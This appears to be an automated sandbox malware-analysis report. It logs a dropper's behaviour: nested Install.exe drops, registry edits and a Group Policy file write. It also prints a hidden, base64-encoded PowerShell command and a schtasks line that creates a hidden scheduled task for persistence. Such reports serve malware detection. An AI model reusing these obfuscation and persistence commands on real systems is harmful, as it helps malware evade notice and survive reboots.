Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6624:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: file.exeStatic file information: File size 7604002 > 1048576

Data Obfuscation

barindex
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00411360 push ecx; mov dword ptr [esp], ecx1_2_00411361
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00413954 push eax; ret 1_2_00413972
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00413CC0 push eax; ret 1_2_00413CEE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FF9A5642625 push eax; retf 24_2_00007FF9A5642609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00E4ECA2 push es; ret 31_2_00E4ECB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_067D6020 push es; ret 31_2_067D6030
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_067D28EF push es; ret 31_2_067D28F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_067DFFA0 push es; ret 31_2_067DFFB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D2780 push es; ret 31_2_068D2790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6780 push es; ret 31_2_068D6790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D47B2 push es; ret 31_2_068D47C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D87F0 push es; ret 31_2_068D8800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D0710 push es; ret 31_2_068D0720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6580 push es; ret 31_2_068D6590
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D4550 push es; ret 31_2_068D4560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D2570 push es; ret 31_2_068D2580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DA292 push es; ret 31_2_068DA2A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DA2B2 push es; ret 31_2_068DA2C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DA270 push es; ret 31_2_068DA2C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D03B0 push es; ret 31_2_068D03C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D4301 push es; ret 31_2_068D4310
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6351 push es; ret 31_2_068D6360
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D8370 push es; ret 31_2_068D8380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DA0D0 push es; ret 31_2_068DA100
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D21F0 push es; ret 31_2_068D2200
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D8111 push es; ret 31_2_068D8120
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DE111 push es; ret 31_2_068DE120
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6172 push es; ret 31_2_068D6180
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D8EE0 push es; ret 31_2_068D8EF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D4F90 push es; ret 31_2_068D4FA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6FD1 push es; ret 31_2_068D6FE0
Source: file.exeStatic PE information: section name: .sxdata
Source: Install.exe.1.drStatic PE information: section name: .sxdata
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00418320

Persistence and Installation Behavior

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeFile created: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeFile created: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exeJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Windows\Tasks\bbsSMGQQDZvgelOgpL.jobJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
